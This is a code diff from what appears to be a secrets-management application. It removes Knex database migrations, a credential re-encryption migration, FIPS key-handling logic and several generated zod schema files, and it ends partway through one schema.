const hasDefaultTypeColumn = await knex.schema.hasColumn(TableName.Project, "defaultProduct");
|
||||
if (hasDefaultTypeColumn) {
|
||||
await knex.schema.alterTable(TableName.Project, (t) => {
|
||||
t.dropColumn("defaultProduct");
|
||||
});
|
||||
}
|
||||
}
|
@ -1,21 +0,0 @@
|
||||
import { Knex } from "knex";
|
||||
|
||||
import { TableName } from "../schemas";
|
||||
|
||||
export async function up(knex: Knex): Promise<void> {
|
||||
const hasColumn = await knex.schema.hasColumn(TableName.SuperAdmin, "encryptedEnvOverrides");
|
||||
if (!hasColumn) {
|
||||
await knex.schema.alterTable(TableName.SuperAdmin, (t) => {
|
||||
t.binary("encryptedEnvOverrides").nullable();
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
export async function down(knex: Knex): Promise<void> {
|
||||
const hasColumn = await knex.schema.hasColumn(TableName.SuperAdmin, "encryptedEnvOverrides");
|
||||
if (hasColumn) {
|
||||
await knex.schema.alterTable(TableName.SuperAdmin, (t) => {
|
||||
t.dropColumn("encryptedEnvOverrides");
|
||||
});
|
||||
}
|
||||
}
|
@ -1,21 +0,0 @@
|
||||
import { Knex } from "knex";
|
||||
|
||||
import { TableName } from "../schemas";
|
||||
|
||||
export async function up(knex: Knex): Promise<void> {
|
||||
const hasColumn = await knex.schema.hasColumn(TableName.OrgMembership, "lastInvitedAt");
|
||||
await knex.schema.alterTable(TableName.OrgMembership, (t) => {
|
||||
if (!hasColumn) {
|
||||
t.datetime("lastInvitedAt").nullable();
|
||||
}
|
||||
});
|
||||
}
|
||||
|
||||
export async function down(knex: Knex): Promise<void> {
|
||||
const hasColumn = await knex.schema.hasColumn(TableName.OrgMembership, "lastInvitedAt");
|
||||
await knex.schema.alterTable(TableName.OrgMembership, (t) => {
|
||||
if (hasColumn) {
|
||||
t.dropColumn("lastInvitedAt");
|
||||
}
|
||||
});
|
||||
}
|
@ -1,23 +0,0 @@
|
||||
import { Knex } from "knex";
|
||||
|
||||
import { TableName } from "../schemas";
|
||||
|
||||
export async function up(knex: Knex): Promise<void> {
|
||||
const hasFipsModeColumn = await knex.schema.hasColumn(TableName.SuperAdmin, "fipsEnabled");
|
||||
|
||||
if (!hasFipsModeColumn) {
|
||||
await knex.schema.alterTable(TableName.SuperAdmin, (table) => {
|
||||
table.boolean("fipsEnabled").notNullable().defaultTo(false);
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
export async function down(knex: Knex): Promise<void> {
|
||||
const hasFipsModeColumn = await knex.schema.hasColumn(TableName.SuperAdmin, "fipsEnabled");
|
||||
|
||||
if (hasFipsModeColumn) {
|
||||
await knex.schema.alterTable(TableName.SuperAdmin, (table) => {
|
||||
table.dropColumn("fipsEnabled");
|
||||
});
|
||||
}
|
||||
}
|
@ -1,21 +0,0 @@
|
||||
import { Knex } from "knex";
|
||||
|
||||
import { TableName } from "../schemas";
|
||||
|
||||
export async function up(knex: Knex): Promise<void> {
|
||||
const hasColumn = await knex.schema.hasColumn(TableName.OrgMembership, "lastInvitedAt");
|
||||
if (hasColumn) {
|
||||
await knex.schema.alterTable(TableName.OrgMembership, (t) => {
|
||||
t.datetime("lastInvitedAt").nullable().defaultTo(knex.fn.now()).alter();
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
export async function down(knex: Knex): Promise<void> {
|
||||
const hasColumn = await knex.schema.hasColumn(TableName.OrgMembership, "lastInvitedAt");
|
||||
if (hasColumn) {
|
||||
await knex.schema.alterTable(TableName.OrgMembership, (t) => {
|
||||
t.datetime("lastInvitedAt").nullable().alter();
|
||||
});
|
||||
}
|
||||
}
|
@ -1,46 +0,0 @@
|
||||
import { Knex } from "knex";
|
||||
|
||||
import { TableName } from "../schemas";
|
||||
|
||||
const MIGRATION_TIMEOUT = 30 * 60 * 1000; // 30 minutes
|
||||
|
||||
export async function up(knex: Knex): Promise<void> {
|
||||
const result = await knex.raw("SHOW statement_timeout");
|
||||
const originalTimeout = result.rows[0].statement_timeout;
|
||||
|
||||
try {
|
||||
await knex.raw(`SET statement_timeout = ${MIGRATION_TIMEOUT}`);
|
||||
|
||||
// iat means IdentityAccessToken
|
||||
await knex.raw(`
|
||||
CREATE INDEX IF NOT EXISTS idx_iat_identity_id
|
||||
ON ${TableName.IdentityAccessToken} ("identityId")
|
||||
`);
|
||||
|
||||
await knex.raw(`
|
||||
CREATE INDEX IF NOT EXISTS idx_iat_ua_client_secret_id
|
||||
ON ${TableName.IdentityAccessToken} ("identityUAClientSecretId")
|
||||
`);
|
||||
} finally {
|
||||
await knex.raw(`SET statement_timeout = '${originalTimeout}'`);
|
||||
}
|
||||
}
|
||||
|
||||
export async function down(knex: Knex): Promise<void> {
|
||||
const result = await knex.raw("SHOW statement_timeout");
|
||||
const originalTimeout = result.rows[0].statement_timeout;
|
||||
|
||||
try {
|
||||
await knex.raw(`SET statement_timeout = ${MIGRATION_TIMEOUT}`);
|
||||
|
||||
await knex.raw(`
|
||||
DROP INDEX IF EXISTS idx_iat_identity_id
|
||||
`);
|
||||
|
||||
await knex.raw(`
|
||||
DROP INDEX IF EXISTS idx_iat_ua_client_secret_id
|
||||
`);
|
||||
} finally {
|
||||
await knex.raw(`SET statement_timeout = '${originalTimeout}'`);
|
||||
}
|
||||
}
|
@ -1,55 +0,0 @@
|
||||
import { Knex } from "knex";
|
||||
|
||||
import { TableName } from "../schemas";
|
||||
|
||||
export async function up(knex: Knex): Promise<void> {
|
||||
const existingSecretApprovalPolicies = await knex(TableName.SecretApprovalPolicy)
|
||||
.whereNull("secretPath")
|
||||
.orWhere("secretPath", "");
|
||||
|
||||
const existingAccessApprovalPolicies = await knex(TableName.AccessApprovalPolicy)
|
||||
.whereNull("secretPath")
|
||||
.orWhere("secretPath", "");
|
||||
|
||||
// update all the secret approval policies secretPath to be "/**"
|
||||
if (existingSecretApprovalPolicies.length) {
|
||||
await knex(TableName.SecretApprovalPolicy)
|
||||
.whereIn(
|
||||
"id",
|
||||
existingSecretApprovalPolicies.map((el) => el.id)
|
||||
)
|
||||
.update({
|
||||
secretPath: "/**"
|
||||
});
|
||||
}
|
||||
|
||||
// update all the access approval policies secretPath to be "/**"
|
||||
if (existingAccessApprovalPolicies.length) {
|
||||
await knex(TableName.AccessApprovalPolicy)
|
||||
.whereIn(
|
||||
"id",
|
||||
existingAccessApprovalPolicies.map((el) => el.id)
|
||||
)
|
||||
.update({
|
||||
secretPath: "/**"
|
||||
});
|
||||
}
|
||||
|
||||
await knex.schema.alterTable(TableName.SecretApprovalPolicy, (table) => {
|
||||
table.string("secretPath").notNullable().alter();
|
||||
});
|
||||
|
||||
await knex.schema.alterTable(TableName.AccessApprovalPolicy, (table) => {
|
||||
table.string("secretPath").notNullable().alter();
|
||||
});
|
||||
}
|
||||
|
||||
export async function down(knex: Knex): Promise<void> {
|
||||
await knex.schema.alterTable(TableName.SecretApprovalPolicy, (table) => {
|
||||
table.string("secretPath").nullable().alter();
|
||||
});
|
||||
|
||||
await knex.schema.alterTable(TableName.AccessApprovalPolicy, (table) => {
|
||||
table.string("secretPath").nullable().alter();
|
||||
});
|
||||
}
|
@ -1,35 +0,0 @@
|
||||
import { Knex } from "knex";
|
||||
|
||||
import { TableName } from "@app/db/schemas";
|
||||
|
||||
export async function up(knex: Knex): Promise<void> {
|
||||
const hasCommitterCol = await knex.schema.hasColumn(TableName.SecretApprovalRequest, "committerUserId");
|
||||
|
||||
if (hasCommitterCol) {
|
||||
await knex.schema.alterTable(TableName.SecretApprovalRequest, (tb) => {
|
||||
tb.uuid("committerUserId").nullable().alter();
|
||||
});
|
||||
}
|
||||
|
||||
const hasRequesterCol = await knex.schema.hasColumn(TableName.AccessApprovalRequest, "requestedByUserId");
|
||||
|
||||
if (hasRequesterCol) {
|
||||
await knex.schema.alterTable(TableName.AccessApprovalRequest, (tb) => {
|
||||
tb.dropForeign("requestedByUserId");
|
||||
tb.foreign("requestedByUserId").references("id").inTable(TableName.Users).onDelete("CASCADE");
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
export async function down(knex: Knex): Promise<void> {
|
||||
// can't undo committer nullable
|
||||
|
||||
const hasRequesterCol = await knex.schema.hasColumn(TableName.AccessApprovalRequest, "requestedByUserId");
|
||||
|
||||
if (hasRequesterCol) {
|
||||
await knex.schema.alterTable(TableName.AccessApprovalRequest, (tb) => {
|
||||
tb.dropForeign("requestedByUserId");
|
||||
tb.foreign("requestedByUserId").references("id").inTable(TableName.Users).onDelete("SET NULL");
|
||||
});
|
||||
}
|
||||
}
|
@ -1,68 +0,0 @@
|
||||
import { Knex } from "knex";
|
||||
|
||||
import { inMemoryKeyStore } from "@app/keystore/memory";
|
||||
import { selectAllTableCols } from "@app/lib/knex";
|
||||
import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
|
||||
|
||||
import { TableName } from "../schemas";
|
||||
import { getMigrationEnvConfig } from "./utils/env-config";
|
||||
import { getMigrationEncryptionServices } from "./utils/services";
|
||||
|
||||
export async function up(knex: Knex) {
|
||||
const existingSuperAdminsWithGithubConnection = await knex(TableName.SuperAdmin)
|
||||
.select(selectAllTableCols(TableName.SuperAdmin))
|
||||
.whereNotNull(`${TableName.SuperAdmin}.encryptedGitHubAppConnectionClientId`);
|
||||
|
||||
const superAdminDAL = superAdminDALFactory(knex);
|
||||
const envConfig = await getMigrationEnvConfig(superAdminDAL);
|
||||
const keyStore = inMemoryKeyStore();
|
||||
const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
|
||||
|
||||
const decryptor = kmsService.decryptWithRootKey();
|
||||
const encryptor = kmsService.encryptWithRootKey();
|
||||
|
||||
const tasks = existingSuperAdminsWithGithubConnection.map(async (admin) => {
|
||||
const overrides = (
|
||||
admin.encryptedEnvOverrides ? JSON.parse(decryptor(Buffer.from(admin.encryptedEnvOverrides)).toString()) : {}
|
||||
) as Record<string, string>;
|
||||
|
||||
if (admin.encryptedGitHubAppConnectionClientId) {
|
||||
overrides.INF_APP_CONNECTION_GITHUB_APP_CLIENT_ID = decryptor(
|
||||
admin.encryptedGitHubAppConnectionClientId
|
||||
).toString();
|
||||
}
|
||||
|
||||
if (admin.encryptedGitHubAppConnectionClientSecret) {
|
||||
overrides.INF_APP_CONNECTION_GITHUB_APP_CLIENT_SECRET = decryptor(
|
||||
admin.encryptedGitHubAppConnectionClientSecret
|
||||
).toString();
|
||||
}
|
||||
|
||||
if (admin.encryptedGitHubAppConnectionPrivateKey) {
|
||||
overrides.INF_APP_CONNECTION_GITHUB_APP_PRIVATE_KEY = decryptor(
|
||||
admin.encryptedGitHubAppConnectionPrivateKey
|
||||
).toString();
|
||||
}
|
||||
|
||||
if (admin.encryptedGitHubAppConnectionSlug) {
|
||||
overrides.INF_APP_CONNECTION_GITHUB_APP_SLUG = decryptor(admin.encryptedGitHubAppConnectionSlug).toString();
|
||||
}
|
||||
|
||||
if (admin.encryptedGitHubAppConnectionId) {
|
||||
overrides.INF_APP_CONNECTION_GITHUB_APP_ID = decryptor(admin.encryptedGitHubAppConnectionId).toString();
|
||||
}
|
||||
|
||||
const encryptedEnvOverrides = encryptor(Buffer.from(JSON.stringify(overrides)));
|
||||
|
||||
await knex(TableName.SuperAdmin).where({ id: admin.id }).update({
|
||||
encryptedEnvOverrides
|
||||
});
|
||||
});
|
||||
|
||||
await Promise.all(tasks);
|
||||
}
|
||||
|
||||
export async function down() {
|
||||
// No down migration needed as this migration is only for data transformation
|
||||
// and does not change the schema.
|
||||
}
|
@ -1,8 +1,6 @@
|
||||
import { z } from "zod";
|
||||
|
||||
import { crypto } from "@app/lib/crypto/cryptography";
|
||||
import { zpStr } from "@app/lib/zod";
|
||||
import { TSuperAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
|
||||
|
||||
const envSchema = z
|
||||
.object({
|
||||
@ -37,7 +35,7 @@ const envSchema = z
|
||||
|
||||
export type TMigrationEnvConfig = z.infer<typeof envSchema>;
|
||||
|
||||
export const getMigrationEnvConfig = async (superAdminDAL: TSuperAdminDALFactory) => {
|
||||
export const getMigrationEnvConfig = () => {
|
||||
const parsedEnv = envSchema.safeParse(process.env);
|
||||
if (!parsedEnv.success) {
|
||||
// eslint-disable-next-line no-console
|
||||
@ -51,24 +49,5 @@ export const getMigrationEnvConfig = async (superAdminDAL: TSuperAdminDALFactory
|
||||
process.exit(-1);
|
||||
}
|
||||
|
||||
let envCfg = Object.freeze(parsedEnv.data);
|
||||
|
||||
const fipsEnabled = await crypto.initialize(superAdminDAL);
|
||||
|
||||
// Fix for 128-bit entropy encryption key expansion issue:
|
||||
// In FIPS it is not ideal to expand a 128-bit key into 256-bit. We solved this issue in the past by creating the ROOT_ENCRYPTION_KEY.
|
||||
// If FIPS mode is enabled, we set the value of ROOT_ENCRYPTION_KEY to the value of ENCRYPTION_KEY.
|
||||
// ROOT_ENCRYPTION_KEY is expected to be a 256-bit base64-encoded key, unlike the 32-byte key of ENCRYPTION_KEY.
|
||||
// When ROOT_ENCRYPTION_KEY is set, our cryptography will always use a 256-bit entropy encryption key. So for the sake of FIPS we should just roll over the value of ENCRYPTION_KEY to ROOT_ENCRYPTION_KEY.
|
||||
if (fipsEnabled) {
|
||||
const newEnvCfg = {
|
||||
...envCfg,
|
||||
ROOT_ENCRYPTION_KEY: envCfg.ENCRYPTION_KEY
|
||||
};
|
||||
delete newEnvCfg.ENCRYPTION_KEY;
|
||||
|
||||
envCfg = Object.freeze(newEnvCfg);
|
||||
}
|
||||
|
||||
return envCfg;
|
||||
return Object.freeze(parsedEnv.data);
|
||||
};
|
||||
|
@ -3,27 +3,12 @@ import { Knex } from "knex";
|
||||
import { initializeHsmModule } from "@app/ee/services/hsm/hsm-fns";
|
||||
import { hsmServiceFactory } from "@app/ee/services/hsm/hsm-service";
|
||||
import { TKeyStoreFactory } from "@app/keystore/keystore";
|
||||
import { folderCheckpointDALFactory } from "@app/services/folder-checkpoint/folder-checkpoint-dal";
|
||||
import { folderCheckpointResourcesDALFactory } from "@app/services/folder-checkpoint-resources/folder-checkpoint-resources-dal";
|
||||
import { folderCommitDALFactory } from "@app/services/folder-commit/folder-commit-dal";
|
||||
import { folderCommitServiceFactory } from "@app/services/folder-commit/folder-commit-service";
|
||||
import { folderCommitChangesDALFactory } from "@app/services/folder-commit-changes/folder-commit-changes-dal";
|
||||
import { folderTreeCheckpointDALFactory } from "@app/services/folder-tree-checkpoint/folder-tree-checkpoint-dal";
|
||||
import { folderTreeCheckpointResourcesDALFactory } from "@app/services/folder-tree-checkpoint-resources/folder-tree-checkpoint-resources-dal";
|
||||
import { identityDALFactory } from "@app/services/identity/identity-dal";
|
||||
import { internalKmsDALFactory } from "@app/services/kms/internal-kms-dal";
|
||||
import { kmskeyDALFactory } from "@app/services/kms/kms-key-dal";
|
||||
import { kmsRootConfigDALFactory } from "@app/services/kms/kms-root-config-dal";
|
||||
import { kmsServiceFactory } from "@app/services/kms/kms-service";
|
||||
import { orgDALFactory } from "@app/services/org/org-dal";
|
||||
import { projectDALFactory } from "@app/services/project/project-dal";
|
||||
import { resourceMetadataDALFactory } from "@app/services/resource-metadata/resource-metadata-dal";
|
||||
import { secretFolderDALFactory } from "@app/services/secret-folder/secret-folder-dal";
|
||||
import { secretFolderVersionDALFactory } from "@app/services/secret-folder/secret-folder-version-dal";
|
||||
import { secretTagDALFactory } from "@app/services/secret-tag/secret-tag-dal";
|
||||
import { secretV2BridgeDALFactory } from "@app/services/secret-v2-bridge/secret-v2-bridge-dal";
|
||||
import { secretVersionV2BridgeDALFactory } from "@app/services/secret-v2-bridge/secret-version-dal";
|
||||
import { userDALFactory } from "@app/services/user/user-dal";
|
||||
|
||||
import { TMigrationEnvConfig } from "./env-config";
|
||||
|
||||
@ -65,77 +50,3 @@ export const getMigrationEncryptionServices = async ({ envConfig, db, keyStore }
|
||||
|
||||
return { kmsService };
|
||||
};
|
||||
|
||||
export const getMigrationPITServices = async ({
|
||||
db,
|
||||
keyStore,
|
||||
envConfig
|
||||
}: {
|
||||
db: Knex;
|
||||
keyStore: TKeyStoreFactory;
|
||||
envConfig: TMigrationEnvConfig;
|
||||
}) => {
|
||||
const projectDAL = projectDALFactory(db);
|
||||
const folderCommitDAL = folderCommitDALFactory(db);
|
||||
const folderCommitChangesDAL = folderCommitChangesDALFactory(db);
|
||||
const folderCheckpointDAL = folderCheckpointDALFactory(db);
|
||||
const folderTreeCheckpointDAL = folderTreeCheckpointDALFactory(db);
|
||||
const userDAL = userDALFactory(db);
|
||||
const identityDAL = identityDALFactory(db);
|
||||
const folderDAL = secretFolderDALFactory(db);
|
||||
const folderVersionDAL = secretFolderVersionDALFactory(db);
|
||||
const secretVersionV2BridgeDAL = secretVersionV2BridgeDALFactory(db);
|
||||
const folderCheckpointResourcesDAL = folderCheckpointResourcesDALFactory(db);
|
||||
const secretV2BridgeDAL = secretV2BridgeDALFactory({ db, keyStore });
|
||||
const folderTreeCheckpointResourcesDAL = folderTreeCheckpointResourcesDALFactory(db);
|
||||
const secretTagDAL = secretTagDALFactory(db);
|
||||
|
||||
const orgDAL = orgDALFactory(db);
|
||||
const kmsRootConfigDAL = kmsRootConfigDALFactory(db);
|
||||
const kmsDAL = kmskeyDALFactory(db);
|
||||
const internalKmsDAL = internalKmsDALFactory(db);
|
||||
const resourceMetadataDAL = resourceMetadataDALFactory(db);
|
||||
|
||||
const hsmModule = initializeHsmModule(envConfig);
|
||||
hsmModule.initialize();
|
||||
|
||||
const hsmService = hsmServiceFactory({
|
||||
hsmModule: hsmModule.getModule(),
|
||||
envConfig
|
||||
});
|
||||
|
||||
const kmsService = kmsServiceFactory({
|
||||
kmsRootConfigDAL,
|
||||
keyStore,
|
||||
kmsDAL,
|
||||
internalKmsDAL,
|
||||
orgDAL,
|
||||
projectDAL,
|
||||
hsmService,
|
||||
envConfig
|
||||
});
|
||||
|
||||
await hsmService.startService();
|
||||
await kmsService.startService();
|
||||
|
||||
const folderCommitService = folderCommitServiceFactory({
|
||||
folderCommitDAL,
|
||||
folderCommitChangesDAL,
|
||||
folderCheckpointDAL,
|
||||
folderTreeCheckpointDAL,
|
||||
userDAL,
|
||||
identityDAL,
|
||||
folderDAL,
|
||||
folderVersionDAL,
|
||||
secretVersionV2BridgeDAL,
|
||||
projectDAL,
|
||||
folderCheckpointResourcesDAL,
|
||||
secretV2BridgeDAL,
|
||||
folderTreeCheckpointResourcesDAL,
|
||||
kmsService,
|
||||
secretTagDAL,
|
||||
resourceMetadataDAL
|
||||
});
|
||||
|
||||
return { folderCommitService };
|
||||
};
|
||||
|
@ -13,9 +13,7 @@ export const AccessApprovalPoliciesApproversSchema = z.object({
|
||||
createdAt: z.date(),
|
||||
updatedAt: z.date(),
|
||||
approverUserId: z.string().uuid().nullable().optional(),
|
||||
approverGroupId: z.string().uuid().nullable().optional(),
|
||||
sequence: z.number().default(1).nullable().optional(),
|
||||
approvalsRequired: z.number().nullable().optional()
|
||||
approverGroupId: z.string().uuid().nullable().optional()
|
||||
});
|
||||
|
||||
export type TAccessApprovalPoliciesApprovers = z.infer<typeof AccessApprovalPoliciesApproversSchema>;
|
||||
|
@ -1,26 +0,0 @@
|
||||
// Code generated by automation script, DO NOT EDIT.
|
||||
// Automated by pulling database and generating zod schema
|
||||
// To update. Just run npm run generate:schema
|
||||
// Written by akhilmhdh.
|
||||
|
||||
import { z } from "zod";
|
||||
|
||||
import { TImmutableDBKeys } from "./models";
|
||||
|
||||
export const AccessApprovalPoliciesBypassersSchema = z.object({
|
||||
id: z.string().uuid(),
|
||||
bypasserGroupId: z.string().uuid().nullable().optional(),
|
||||
bypasserUserId: z.string().uuid().nullable().optional(),
|
||||
policyId: z.string().uuid(),
|
||||
createdAt: z.date(),
|
||||
updatedAt: z.date()
|
||||
});
|
||||
|
||||
export type TAccessApprovalPoliciesBypassers = z.infer<typeof AccessApprovalPoliciesBypassersSchema>;
|
||||
export type TAccessApprovalPoliciesBypassersInsert = Omit<
|
||||
z.input<typeof AccessApprovalPoliciesBypassersSchema>,
|
||||
TImmutableDBKeys
|
||||
>;
|
||||
export type TAccessApprovalPoliciesBypassersUpdate = Partial<
|
||||
Omit<z.input<typeof AccessApprovalPoliciesBypassersSchema>, TImmutableDBKeys>
|
||||
>;
|
@ -11,7 +11,7 @@ export const AccessApprovalPoliciesSchema = z.object({
|
||||
id: z.string().uuid(),
|
||||
name: z.string(),
|
||||
approvals: z.number().default(1),
|
||||
secretPath: z.string(),
|
||||
secretPath: z.string().nullable().optional(),
|
||||
envId: z.string().uuid(),
|
||||
createdAt: z.date(),
|
||||
updatedAt: z.date(),
|
||||
|
@ -18,9 +18,7 @@ export const AccessApprovalRequestsSchema = z.object({
|
||||
createdAt: z.date(),
|
||||
updatedAt: z.date(),
|
||||
requestedByUserId: z.string().uuid(),
|
||||
note: z.string().nullable().optional(),
|
||||
privilegeDeletedAt: z.date().nullable().optional(),
|
||||
status: z.string().default("pending")
|
||||
note: z.string().nullable().optional()
|
||||
});
|
||||
|
||||
export type TAccessApprovalRequests = z.infer<typeof AccessApprovalRequestsSchema>;
|
||||
|
@ -12,8 +12,8 @@ export const CertificateAuthoritiesSchema = z.object({
|
||||
createdAt: z.date(),
|
||||
updatedAt: z.date(),
|
||||
projectId: z.string(),
|
||||
status: z.string(),
|
||||
enableDirectIssuance: z.boolean().default(true),
|
||||
status: z.string(),
|
||||
name: z.string()
|
||||
});
|
||||
|
||||
|
@ -25,8 +25,8 @@ export const CertificatesSchema = z.object({
|
||||
certificateTemplateId: z.string().uuid().nullable().optional(),
|
||||
keyUsages: z.string().array().nullable().optional(),
|
||||
extendedKeyUsages: z.string().array().nullable().optional(),
|
||||
projectId: z.string(),
|
||||
pkiSubscriberId: z.string().uuid().nullable().optional()
|
||||
pkiSubscriberId: z.string().uuid().nullable().optional(),
|
||||
projectId: z.string()
|
||||
});
|
||||
|
||||
export type TCertificates = z.infer<typeof CertificatesSchema>;
|
||||
|
@ -16,8 +16,7 @@ export const DynamicSecretLeasesSchema = z.object({
|
||||
statusDetails: z.string().nullable().optional(),
|
||||
dynamicSecretId: z.string().uuid(),
|
||||
createdAt: z.date(),
|
||||
updatedAt: z.date(),
|
||||
config: z.unknown().nullable().optional()
|
||||
updatedAt: z.date()
|
||||
});
|
||||
|
||||
export type TDynamicSecretLeases = z.infer<typeof DynamicSecretLeasesSchema>;
|
||||
|
@ -28,8 +28,7 @@ export const DynamicSecretsSchema = z.object({
|
||||
updatedAt: z.date(),
|
||||
encryptedInput: zodBuffer,
|
||||
projectGatewayId: z.string().uuid().nullable().optional(),
|
||||
gatewayId: z.string().uuid().nullable().optional(),
|
||||
usernameTemplate: z.string().nullable().optional()
|
||||
gatewayId: z.string().uuid().nullable().optional()
|
||||
});
|
||||
|
||||
export type TDynamicSecrets = z.infer<typeof DynamicSecretsSchema>;
|
||||
|
@ -1,23 +0,0 @@
|
||||
// Code generated by automation script, DO NOT EDIT.
|
||||
// Automated by pulling database and generating zod schema
|
||||
// To update. Just run npm run generate:schema
|
||||
// Written by akhilmhdh.
|
||||
|
||||
import { z } from "zod";
|
||||
|
||||
import { TImmutableDBKeys } from "./models";
|
||||
|
||||
export const FolderCheckpointResourcesSchema = z.object({
|
||||
id: z.string().uuid(),
|
||||
folderCheckpointId: z.string().uuid(),
|
||||
secretVersionId: z.string().uuid().nullable().optional(),
|
||||
folderVersionId: z.string().uuid().nullable().optional(),
|
||||
createdAt: z.date(),
|
||||
updatedAt: z.date()
|
||||
});
|
||||
|
||||
export type TFolderCheckpointResources = z.infer<typeof FolderCheckpointResourcesSchema>;
|
||||
export type TFolderCheckpointResourcesInsert = Omit<z.input<typeof FolderCheckpointResourcesSchema>, TImmutableDBKeys>;
|
||||
export type TFolderCheckpointResourcesUpdate = Partial<
|
||||
Omit<z.input<typeof FolderCheckpointResourcesSchema>, TImmutableDBKeys>
|
||||
>;
|
@ -1,19 +0,0 @@
|
||||
// Code generated by automation script, DO NOT EDIT.
|
||||
// Automated by pulling database and generating zod schema
|
||||
// To update. Just run npm run generate:schema
|
||||
// Written by akhilmhdh.
|
||||
|
||||
import { z } from "zod";
|
||||
|
||||
import { TImmutableDBKeys } from "./models";
|
||||
|
||||
export const FolderCheckpointsSchema = z.object({
|
||||
id: z.string().uuid(),
|
||||
folderCommitId: z.string().uuid(),
|
||||
createdAt: z.date(),
|
||||
updatedAt: z.date()
|
||||
});
|
||||
|
||||
export type TFolderCheckpoints = z.infer<typeof FolderCheckpointsSchema>;
|
||||
export type TFolderCheckpointsInsert = Omit<z.input<typeof FolderCheckpointsSchema>, TImmutableDBKeys>;
|
||||
export type TFolderCheckpointsUpdate = Partial<Omit<z.input<typeof FolderCheckpointsSchema>, TImmutableDBKeys>>;
|
@ -1,23 +0,0 @@
|
||||
// Code generated by automation script, DO NOT EDIT.
|
||||
// Automated by pulling database and generating zod schema
|
||||
// To update. Just run npm run generate:schema
|
||||
// Written by akhilmhdh.
|
||||
|
||||
import { z } from "zod";
|
||||
|
||||
import { TImmutableDBKeys } from "./models";
|
||||
|
||||
export const FolderCommitChangesSchema = z.object({
|
||||
id: z.string().uuid(),
|
||||
folderCommitId: z.string().uuid(),
|
||||
changeType: z.string(),
|
||||
isUpdate: z.boolean().default(false),
|
||||
secretVersionId: z.string().uuid().nullable().optional(),
|
||||
folderVersionId: z.string().uuid().nullable().optional(),
|
||||
createdAt: z.date(),
|
||||
updatedAt: z.date()
|
||||
});
|
||||
|
||||
export type TFolderCommitChanges = z.infer<typeof FolderCommitChangesSchema>;
|
||||
export type TFolderCommitChangesInsert = Omit<z.input<typeof FolderCommitChangesSchema>, TImmutableDBKeys>;
|
||||
export type TFolderCommitChangesUpdate = Partial<Omit<z.input<typeof FolderCommitChangesSchema>, TImmutableDBKeys>>;
|
@ -1,24 +0,0 @@
|
||||
// Code generated by automation script, DO NOT EDIT.
|
||||
// Automated by pulling database and generating zod schema
|
||||
// To update. Just run npm run generate:schema
|
||||
// Written by akhilmhdh.
|
||||
|
||||
import { z } from "zod";
|
||||
|
||||
import { TImmutableDBKeys } from "./models";
|
||||
|
||||
export const FolderCommitsSchema = z.object({
|
||||
id: z.string().uuid(),
|
||||
commitId: z.coerce.bigint(),
|
||||
actorMetadata: z.unknown(),
|
||||
actorType: z.string(),
|
||||
message: z.string().nullable().optional(),
|
||||
folderId: z.string().uuid(),
|
||||
envId: z.string().uuid(),
|
||||
createdAt: z.date(),
|
||||
updatedAt: z.date()
|
||||
});
|
||||
|
||||
export type TFolderCommits = z.infer<typeof FolderCommitsSchema>;
|
||||
export type TFolderCommitsInsert = Omit<z.input<typeof FolderCommitsSchema>, TImmutableDBKeys>;
|
||||
export type TFolderCommitsUpdate = Partial<Omit<z.input<typeof FolderCommitsSchema>, TImmutableDBKeys>>;
|
@ -1,26 +0,0 @@
|
||||
// Code generated by automation script, DO NOT EDIT.
|
||||
// Automated by pulling database and generating zod schema
|
||||
// To update. Just run npm run generate:schema
|
||||
// Written by akhilmhdh.
|
||||
|
||||
import { z } from "zod";
|
||||
|
||||
import { TImmutableDBKeys } from "./models";
|
||||
|
||||
export const FolderTreeCheckpointResourcesSchema = z.object({
|
||||
id: z.string().uuid(),
|
||||
folderTreeCheckpointId: z.string().uuid(),
|
||||
folderId: z.string().uuid(),
|
||||
folderCommitId: z.string().uuid(),
|
||||
createdAt: z.date(),
|
||||
updatedAt: z.date()
|
||||
});
|
||||
|
||||
export type TFolderTreeCheckpointResources = z.infer<typeof FolderTreeCheckpointResourcesSchema>;
|
||||
export type TFolderTreeCheckpointResourcesInsert = Omit<
|
||||
z.input<typeof FolderTreeCheckpointResourcesSchema>,
|
||||
TImmutableDBKeys
|
||||
>;
|
||||
export type TFolderTreeCheckpointResourcesUpdate = Partial<
|
||||
Omit<z.input<typeof FolderTreeCheckpointResourcesSchema>, TImmutableDBKeys>
|
||||
>;
|
@ -1,19 +0,0 @@
|
||||
// Code generated by automation script, DO NOT EDIT.
|
||||
// Automated by pulling database and generating zod schema
|
||||
// To update. Just run npm run generate:schema
|
||||
// Written by akhilmhdh.
|
||||
|
||||
import { z } from "zod";
|
||||
|
||||
import { TImmutableDBKeys } from "./models";
|
||||
|
||||
export const FolderTreeCheckpointsSchema = z.object({
|
||||
id: z.string().uuid(),
|
||||
folderCommitId: z.string().uuid(),
|
||||
createdAt: z.date(),
|
||||
updatedAt: z.date()
|
||||
});
|
||||
|
||||
export type TFolderTreeCheckpoints = z.infer<typeof FolderTreeCheckpointsSchema>;
|
||||
export type TFolderTreeCheckpointsInsert = Omit<z.input<typeof FolderTreeCheckpointsSchema>, TImmutableDBKeys>;
|
||||
export type TFolderTreeCheckpointsUpdate = Partial<Omit<z.input<typeof FolderTreeCheckpointsSchema>, TImmutableDBKeys>>;
|
@ -12,8 +12,7 @@ export const IdentitiesSchema = z.object({
|
||||
name: z.string(),
|
||||
authMethod: z.string().nullable().optional(),
|
||||
createdAt: z.date(),
|
||||
updatedAt: z.date(),
|
||||
hasDeleteProtection: z.boolean().default(false)
|
||||
updatedAt: z.date()
|
||||
});
|
||||
|
||||
export type TIdentities = z.infer<typeof IdentitiesSchema>;
|
||||
|
@ -1,25 +0,0 @@
|
||||
// Code generated by automation script, DO NOT EDIT.
|
||||
// Automated by pulling database and generating zod schema
|
||||
// To update. Just run npm run generate:schema
|
||||
// Written by akhilmhdh.
|
||||
|
||||
import { z } from "zod";
|
||||
|
||||
import { TImmutableDBKeys } from "./models";
|
||||
|
||||
export const IdentityAlicloudAuthsSchema = z.object({
|
||||
id: z.string().uuid(),
|
||||
accessTokenTTL: z.coerce.number().default(7200),
|
||||
accessTokenMaxTTL: z.coerce.number().default(7200),
|
||||
accessTokenNumUsesLimit: z.coerce.number().default(0),
|
